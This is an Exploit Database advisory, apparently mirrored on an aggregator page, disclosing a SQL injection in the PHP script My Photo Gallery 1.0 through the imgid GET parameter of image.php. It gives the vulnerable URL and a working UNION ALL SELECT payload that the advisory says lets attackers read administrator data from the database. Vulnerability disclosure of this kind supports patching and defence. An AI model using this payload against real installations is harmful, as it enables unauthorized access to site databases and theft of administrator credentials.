My Photo Gallery 1.0 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Kaan KAMIS
  日期： 2017-01-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41177/

• Introduction
  
  Exploit Title: My Photo Gallery – SQL Injection
  Date: 27.01.2017
  Vendor Homepage: http://software.friendsinwar.com/
  Software Link: http://software.friendsinwar.com/news.php?readmore=40
  Exploit Author: Kaan KAMIS
  Contact: iletisim[at]k2an[dot]com
  Website: http://k2an.com
  Category: Web Application Exploits
   
  Overview
   
  My Photo Gallery is a free is a user-friendly picture gallery script.
  Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
  The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
  
  Type of vulnerability:
  
  An SQL Injection vulnerability in My Photo Gallery allows attackers to read
  arbitrary administrator data from the database.
  
  Vulnerable Url:
  
  http://locahost/my_photo_gallery/image.php?imgid=[payload]
  Vulnerable parameter : imgid
  Mehod : GET
  
  Payload:
  imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--